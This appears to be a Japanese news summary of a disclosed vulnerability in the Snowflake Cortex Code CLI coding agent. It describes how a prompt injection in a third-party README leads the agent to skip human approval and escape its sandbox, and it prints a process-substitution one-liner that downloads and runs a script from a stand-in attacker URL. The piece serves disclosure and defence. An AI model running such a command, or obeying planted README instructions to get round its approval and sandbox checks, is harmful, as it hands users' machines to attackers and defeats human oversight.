Snowflake Cortex Code CLIの脆弱性により、サンドボックスからの脱出とマルウェアの実行が可能になりました

脆弱性の詳細
Snowflake Cortex Code CLIは、Claude CodeやOpenAIのCodexと同様に動作するコマンドラインコーディングエージェントで、SnowflakeでSQLを実行するための組み込み統合機能を備えています。リリースから2日後、Cortex Codeのコマンド検証システムに脆弱性が発見され、特別に構築された悪意のあるコマンドが、人間による承認ステップをトリガーすることなく任意のコマンドを実行し、それらのコマンドをCortex CLIのサンドボックスの外で実行することが可能になりました。
攻撃の連鎖
この攻撃は間接的なプロンプトインジェクションを介して機能します。ユーザーがCortexを開きサンドボックスを有効にした後、サードパーティのオープンソースコードベースに関するヘルプをCortexに求めます。信頼できないリポジトリのREADMEに隠されたプロンプトインジェクションにより、Cortexは危険なコマンドを実行する必要があると誤認させられます。
Cortexはプロセス置換式内のコマンドを検証できず、悪意のあるコマンドの未承認実行を許してしまいました:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))このコマンドは攻撃者のサーバーからスクリプトをダウンロードして実行します。このバイパスが機能した理由は以下の通りです:
- プロセス置換 <() 式内の安全でないコマンドは検証システムによって評価されなかった
- 完全なコマンドは「安全な」コマンド(この場合はcat)で始まっていた
- プロセス置換式内のコマンドは人間の承認をトリガーしなかった
サンドボックスバイパス
プロンプトインジェクションはまた、モデルを操作してサンドボックス外でのコマンド実行をトリガーするフラグを設定します。Cortexはデフォルトで、サンドボックス外でのコマンド実行をトリガーするフラグを設定でき、このインジェクションはこれを使用して悪意のあるコマンドがサンドボックスの外で実行されることを可能にします。
対策
Snowflakeのセキュリティチームはこの脆弱性を検証し対策を講じ、2026年2月28日にCortex Code CLIバージョン1.0.25で修正をリリースしました。Snowflakeの完全なアドバイザリはSnowflakeコミュニティサイトで入手可能です:https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
注:この攻撃連鎖は非サンドボックスユーザーにも適用されました。ドキュメントによると、OS+通常モードでは、すべてのコマンドがユーザーの承認を求めます。サンドボックスで実行されるコマンドにはネットワークおよびファイルアクセスの制限もあります。
📖 Read the full source: HN AI Agents
👀 See Also

オープンソースのRAG攻撃と防御ラボ:ローカルのChromaDB + LM Studioスタック向け
オープンソースのラボが、ChromaDBとLM Studioを使用したデフォルトのローカルセットアップにおけるRAG知識ベース汚染の効果を測定し、防御されていないシステムでは95%の成功率を示し、実用的な防御策を評価しています。

OpenClawスキルアナライザー:AIエージェントスキルの静的セキュリティスキャナー
ある開発者が、インストール前にOpenClawスキルのセキュリティリスクをスキャンする静的解析ツールを構築しました。プロンプトインジェクションやデータ流出など12カテゴリにわたる40以上の検出ルールを備えています。

Pro Se原告在法庭文件中隐藏AI提示注入
コネチカット州で自身を代理する原告が、裁判所提出文書にプロンプトインジェクションを白い3ポイントのフォントで隠し、AIが自分に有利な判断を下すよう指示していた。裁判所はこれを発見し、制裁を科した。

ローカルエージェントAPIキーのセキュリティのためのプロキシ層分離
開発者が、ローカルエージェントセットアップ(Claude Code / Cursorスタイルのワークフロー)において、ほとんどのスタックが環境変数や<code>.env</code>ファイルを通じてAPIキーを公開し、任意のツール、プラグイン、またはプロンプトインジェクションされたコードが資格情報を読み取る可能性があるセキュリティリスクを生み出していることに気づきました。